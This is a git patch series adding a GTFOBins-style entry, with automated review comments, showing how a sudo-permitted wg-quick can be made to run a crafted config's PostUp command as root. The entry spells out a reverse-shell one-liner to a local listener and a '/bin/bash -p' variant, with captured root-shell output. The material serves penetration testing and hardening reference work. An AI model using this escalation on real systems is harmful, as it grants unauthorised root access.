From fba8b35229caef441da838b7dd92846e181114d6 Mon Sep 17 00:00:00 2001 From: virgula Date: Wed, 3 Dec 2025 15:29:05 +0100 Subject: [PATCH 1/4] Add wg-quick sudo priv escalation --- _gtfobins/wg-quick.md | 42 ++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 42 insertions(+) create mode 100644 _gtfobins/wg-quick.md diff --git a/_gtfobins/wg-quick.md b/_gtfobins/wg-quick.md new file mode 100644 index 0000000..fc83566 --- /dev/null +++ b/_gtfobins/wg-quick.md @@ -0,0 +1,42 @@ +--- +description: If the `wg-quick` binary is allowed via `sudo`, it can be abused to create a fake configuration which allows executing commands with root privileges. + +This example creates a fake config parsed and loaded by `wg-quick`, allowing for obtaining a full reserve shell with root privileges. Note that here, `netcat` will be used, but of course, there are plenty of payloads you can replace to obtain the same. + +functions: + sudo: + - description: + If the `sudo -l` shows such a binary in the output + + ``` + (ALL) PASSWD: /usr/bin/wg-quick, + ``` + + This feature can be abused. + + code: + Exploit, + + ``` + cat << EOF > ./wg1.conf + [Interface] + ListenPort = 51821 + PrivateKey = yNwWXHO7oIDQo/b5eS5R0xdVidxm50AwuQoIKTOGy1g= + + PostUp = sh -i >& /dev/tcp/127.0.0.1/1234 0>&1 + + EOF + ``` + + `sudo wg-quick up ./wg1.conf` + + Will send a reverse shell on `127.0.0.1:1234` with root privileges + + ``` + nc -lvnp 1234 + listening on [any] 1234 ... + connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 55456 + # whoami + root + ``` +--- \ No newline at end of file From ddd3520b01175a67398e061fc4bed39ab07c54ae Mon Sep 17 00:00:00 2001 From: virgula Date: Wed, 3 Dec 2025 15:42:05 +0100 Subject: [PATCH 2/4] Update exploit with direct /bin/bash drop --- _gtfobins/wg-quick.md | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) diff --git a/_gtfobins/wg-quick.md b/_gtfobins/wg-quick.md index fc83566..eec8b5e 100644 --- a/_gtfobins/wg-quick.md +++ b/_gtfobins/wg-quick.md 
@@ -39,4 +39,26 @@ functions: # whoami root ``` + + Another more direct way to obain a shell is to avoid the usage of netcat at all + + ``` + cat << EOF > ./wg1.conf + [Interface] + ListenPort = 51821 + PrivateKey = yNwWXHO7oIDQo/b5eS5R0xdVidxm50AwuQoIKTOGy1g= + + PostUp = /bin/bash -p + + EOF + ``` + + `sudo wg-quick up ./wg1.conf` + + This will directly drop to a `root` shell. + + ``` + #whoami + root + `` --- \ No newline at end of file From a5af2bdd4749f56d45e324c014918e0ad7704512 Mon Sep 17 00:00:00 2001 From: virgula Date: Wed, 3 Dec 2025 15:44:06 +0100 Subject: [PATCH 3/4] Update typo --- _gtfobins/wg-quick.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/_gtfobins/wg-quick.md b/_gtfobins/wg-quick.md index eec8b5e..68ff49b 100644 --- a/_gtfobins/wg-quick.md +++ b/_gtfobins/wg-quick.md @@ -60,5 +60,5 @@ functions: ``` #whoami root - `` + ``` --- \ No newline at end of file From 0377b620ee42b645b2aba477d2a5945c105f1987 Mon Sep 17 00:00:00 2001 From: virgula Date: Fri, 5 Dec 2025 10:55:59 +0100 Subject: [PATCH 4/4] Fix yaml lint --- _gtfobins/wg-quick.md | 11 ++++++----- 1 file changed, 6 insertions(+), 5 deletions(-) diff --git a/_gtfobins/wg-quick.md b/_gtfobins/wg-quick.md index 68ff49b..3a7c07e 100644 --- a/_gtfobins/wg-quick.md +++ b/_gtfobins/wg-quick.md 
@@ -1,11 +1,12 @@ --- -description: If the `wg-quick` binary is allowed via `sudo`, it can be abused to create a fake configuration which allows executing commands with root privileges. +description: | + If the `wg-quick` binary is allowed via `sudo`, it can be abused to create a fake configuration which allows executing commands with root privileges. -This example creates a fake config parsed and loaded by `wg-quick`, allowing for obtaining a full reserve shell with root privileges. Note that here, `netcat` will be used, but of course, there are plenty of payloads you can replace to obtain the same. + This example creates a fake config parsed and loaded by `wg-quick`, allowing for obtaining a full reserve shell with root privileges. Note that here, `netcat` will be used, but of course, there are plenty of payloads you can replace to obtain the same. functions: sudo: - - description: + - description: | If the `sudo -l` shows such a binary in the output ``` @@ -14,7 +15,7 @@ functions: This feature can be abused. - code: + code: | Exploit, ``` @@ -61,4 +62,4 @@ functions: #whoami root ``` ---- \ No newline at end of file +---
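Review bot: in PATCH 1/4, "reserve shell" in the second description paragraph should read "reverse shell"; PATCH 4/4 re-indents that sentence without correcting it, so it needs fixing in both places. In the same hunk, the quoted `sudo -l` line `(ALL) PASSWD: /usr/bin/wg-quick,` ends with a comma that `sudo -l` emits only as a separator between several commands in one entry; drop it so the example matches a real single-entry listing. The `description:` value is also a plain scalar whose second paragraph starts at column 0, which is not well-formed YAML for a mapping value; PATCH 4/4 later switches to `description: |`, and that fix belongs squashed into this commit so every revision of the file parses.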
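Review bot: in PATCH 2/4 the closing fence of the final output block is two backticks instead of three, leaving the block unterminated (PATCH 3/4 repairs it; squash the two). Also "obain" should be "obtain", and `#whoami` should be `# whoami` to match the prompt in the first transcript. The hunk repeats the whole config just to change one line; stating only the differing `PostUp = /bin/bash -p` line would be clearer, and since this variant needs no listener the first paragraph's "Note that here, `netcat` will be used" no longer describes the entry and should be rewritten.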
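Review bot: PATCH 3/4 only restores the fence broken in PATCH 2/4 and carries no change of its own; fold it into PATCH 2/4 rather than keeping a separate "Update typo" commit in the history.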
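Review bot: in the `code: |` hunk of PATCH 4/4 the block scalar now carries "Exploit,", explanatory prose, and the captured `nc` and `whoami` sessions alongside the commands. Keep `code` to what is actually run (the heredoc and `sudo wg-quick up ./wg1.conf`) and move the explanation and expected output under `description`, so the `code` field can be copied verbatim; the missing-newline-at-EOF fix in the last hunk is fine as is.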